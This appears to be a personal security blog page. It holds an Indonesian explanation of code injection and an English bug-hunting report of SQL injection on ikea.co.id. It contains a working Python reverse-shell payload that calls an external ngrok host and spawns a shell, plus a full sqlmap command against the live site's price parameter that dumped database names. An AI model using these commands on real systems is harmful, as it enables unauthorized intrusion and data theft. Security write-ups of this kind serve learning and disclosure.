Yudha-Ard 🔧: Februari 2021

Apa Itu Code Injection (Kode Injeksi) dan Apa Dampaknya?

Dikutip dari https://www.owasp.org/index.php/Code_Injection, Kode Injeksi adalah istilah umum untuk jenis serangan yang terdiri dari kode yang disuntikan yang kemudian ditafsirkan / dieksekusi oleh aplikasi. Serangan ini biasanya dimungkinkan karena kurangnya validasi data input / output yang tepat, misalnya:

Jarakter yang diizinkan (kelas regular expressions standar atau khusus)
format data
Jumlah data yang diharapkan

Jika berhasil meng-eksploitasi serangan ini, dampaknya dapat mencakup bocornya data, hilangnya data atau informasi yang telah dicuri oleh penyerang

POC (Proof Of Concept) :

Saya mencoba menjalankan perintah shell dengan modul os, ternyata code tereksekusi dengan lancar

import osos.system('uname -a')

lalu saya mencoba me-reverse shell via command line, sebelumnya saya menggunakan netcat untuk listener “nc -lvp 6969” Karena ip address saya bukan public ip maka saya akan forward ip address saya dengan ngrok “ngrok tcp 6969” kemudian gunakan public address yang di assign ngrok sebagai ip dan port dipayload yang dieksekusi. Berikut kode yang saya gunakan

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("0.tcp.ngrok.io",12084));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

Sekian dari saya kurang lebih mohon maaf , Wassalamualaikum Wr.Wb

SQL-Injection On Ikea.co.id

Yudha-Ard

IKEA SQL-Injection – Hello, Here I will share my experience of hunting bugs on an e-commerce site in Indonesia.This experience started when I was browsing to see and find references to articles for a college assignment I was working on,I saw banners / advertisements from the IKEA.CO.ID website which often popped up immediately crossed my mind to try to do a pentest on the website IKEA. CO.ID.

Prof Of Concept

1. Visit Product Page "https://www.ikea.co.id/in/products/"

2. Search for a product & navigate to the product page according to the name of the product search

3. Get product filter and see json response on Network panel

4. I have the parameter in the url "https://www.ikea.co.id/in/products/template_reload?&q=meja&price="

5. I think the parameter price has sqli potential because I tried to enter in your SQL injection payload into price params i get error information on page.

6. I tried the test with the sqlmap tools and I tried dump for get DB_NAME with payload ' ./sqlmap.py -u "https://www.ikea.co.id/in/products/template_reload?&q=meja&price=1" --random-agent -p"price" --risk=3 --level=3 --tamper=randomcase --threads=2 --text-only --no-cast --batch --dbms=postgresql --dbs '

7. I got 27 DATABASE NAME on system